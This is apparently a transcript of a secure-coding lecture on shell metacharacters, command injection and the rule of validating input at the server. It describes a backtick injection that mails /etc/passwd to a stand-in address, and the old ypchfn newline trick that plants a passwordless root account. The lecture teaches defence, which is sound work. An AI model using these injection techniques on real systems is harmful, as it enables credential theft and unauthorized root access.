Welcome to video one, the second video of section 4.2. Here we're going to talk about metacharacters. A metacharacter is simply something that is interpreted specially. The dollar sign for example to the command interpreter on Linux and Unix systems that indicates a variable. As you can see, there are a number of other special characters. Note especially the backslash which is used to remove or demetacharacterize, I guess, the next character. So if you've backslash dollar sign, the shell will always interpret that as a dollar sign. Now, the ones at the top all shells respect. But some shells do things a little bit differently or have extra characters. For example, in C Shell, the exclamation point typically means history. In some shells, you can use printf style functions to have the Shell do certain things. For example, they will print the second argument to the Shell script as a hexadecimal number. So know which Shell you're using and what the characters are that have special meaning. Notice by the way at the top of the star would simply expands in the shell to match all files. What's particularly interesting about that is in the editor regular expressions; star means repeat the previous character or pattern zero or more times, which is very different than the start to the command interpreter. Here the arrow sign, the less-than sign is redirection. The semicolon is command separator. The back ticks say, run the command between the back ticks and replace what's between the back ticks including the back ticks themselves of course, with the output. So for example, the top line would simply send me@here.com the password file, and then print here.com. So that entire line would appear to the Shell as here.com. You can also have it do strange editing. For example, in the second line, you're receiving input. What this input particularly says is, "Delete everything, beginning with line one and going to the first blank line". The third command deals with remote execution on a host and I'm using remexec here. Even though that's not a command, you can replace it with SSH or a couple of others that I'll show you, which are older but our archetypal examples of programming errors. In this case, the remote host will get the command echo followed by the arguments, and notice the backslash in front of the back tick. That means the program that is running the remexec and command, in other words, the host you're typing this on is to treat those back ticks just as characters. But the remote host, one called host here, will get the command echo followed by "back tick mail me@h.com. arrow sign etc password; hi back tick". No backslashes. So me@h.com will get a copy of the password file and the entire thing between the back ticks will be replaced by hi. So the remote host will simply print hi. If you've ever heard of the current command injection, this is an example of it. On the next slide and the following ones, we're going to talk a little bit about how to handle things like this. What is some of the problems that might arise? The first one is, who does the checking: the client, the server, someone else? The canonical example of this is a program that thankfully no longer exists called rexd. Rexd was a demon that would take input from the net and execute it. The problem was rexd assumed that the client, did all of the checking. So the client would authenticate that the user had the authority to run the command on the remote system and that the user is who they claimed to be. So it would check authentication and authorization. So rexd itself said, "Oh gee, everything's already done, so I just have to run the command". The problem of course is what happens if I write my own client and I do other clients checking doesn't work. Here's one that is even more direct. In many Linux and Unix systems, there used to be a set of commands called YP. It stood for yellow pages. Then it got changed to NIS for network information systems. The basic idea was to centralize authentication information into one database call, and then things like YP password and this password would use that database to validate users. This was common when you had many workstations in one particular area or for one particular set of people. Instead of having each one have their own authentication database, put it on a central node and then they could query, number of advantages here of course. Well, the way the password information was stored was in a file with fields separated by colons, and the records were separated by new lines. So each user had one record and there were seven fields in each record. The first one being the username, the second one being the hash password, not in the clear but it was hashed, the third being the UID, the fourth being the GID and so forth, the fifth one being identifying information, and the sixth one if I remember correctly was the home directory, and the seventh the shell. In any case, when you log in, your password was checked against this database, and then you are assigned the UID and the GID that was in the database in the particular record associated with you. Well, these were separated by colons. Okay. So when you change information not on the central server, it would have to send a message over the network. So initially, the server did no checking of what was sent. So when you ran the program, for example to change your information, which was ypchfn for change firstname or change information, what you would do is type what you wanted in that field that identified you, then put in a colon, then put it in a home directory, then put in a colon, then put in shell, then enter a new line. Then you would put in a name followed by an empty password field, followed by a UID of say zero to give you administrator privileges and so forth. So now there was a beginning of a second line that gave you system administration privileges without a password. In this case, what she would simply do is embed the new line. Since the server didn't check whether there was a colon or a new line, it would just write the data into the database without a problem. The next slide shows this in more detail. There's an example of a password file. The hash is the zbcdef part. The field that CHF and changes is the part that says Matt Bishop. So we call ypchfn and when it asks for your new name, we put in the line that's shown down there. Now, the important part here is the Ctrl+V, Ctrl+J. Ctrl+V says, take the next character literally Robert of any meeting to the Shell. The Ctrl+J is a new line which normally would terminate the entry. But since it's preceded directly by Ctrl+V, it's treated just as a character just like the letter a or b. Then, if you look following that, you have MR which is a new username, and then the two colons. That second field, the one between the colon is where the password hash goes. Since there's nothing there, there's no password for the account. So after this is run by the server, if you take a look at the next part after the change you have, you will see that there are now two lines, the second line picking up where the first-line left off instead of that one single line. So now what I do is I log into the system as MR. I won't get a patent when he asks for a password because there is none, and I'll get root. Okay. So how do you handle this? Well, what they did first of all was changed the client to disallow colons and new lines in the field. So even if you did what I showed you before, ypchfn would say, "Hey, no. I'm sorry, you have a colon there. I'm not going to accept this. So does a client run with any privileges? It turned out, no. So what people did was they wrote their own client to send over whatever they wanted, and the server made the assumption that the client was doing the checking. Bad assumption. The second time they did it right, they then fixed the server. That's a good example of why you want to do verification and validation as close to the resources you're protecting as possible. Because the server controls access to the database and deals directly with the database. The server dealing directly with the big database, that's where you do the checking. Doing it at the client is nice because it will save you sending things over the network. But doing it at the server is critical, because whatever you've got is going into that database and you want to make sure what goes into that database is right. So this leads to a couple of requirements that are shown on the next slide. Know what the server expects in ypchfn, it expects a well-formed fifth field. That means no colons, no new lines, no other special characters that your system may interpret wrongly. Rexd expected to authorize command from an authenticated user. It got neither. So the servers really should expect anything else. In both cases, the server should have assumed that the client either lied or made a mistake and the server should have done the checking. Hence the rule which you see on this slide, validate as close to the resource being protected as you can.